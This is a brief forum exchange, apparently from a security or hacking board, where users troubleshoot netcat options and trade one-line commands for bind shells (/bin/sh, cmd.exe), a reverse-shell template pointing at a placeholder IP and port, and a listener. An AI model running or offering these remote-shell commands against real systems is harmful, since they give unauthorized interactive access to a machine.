It looks like you're new here. If you want to get involved, click one of these buttons!
are you sure you tried "l"? "L" with "l" is diffirent.
~$ nc -v -L -p 80 -e /bin/sh
nc: invalid option -- 'L'
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-P proxy_username] [-p source_port]
[-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [hostname] [port[s]]
nc -nvv -l -p -e /bin/sh <port of choice>
nc -l -p 1337 -e cmd.exe
nc -nv <your ip> <your port> -e (cmd, or shell command)
nc -lvnp <desired port>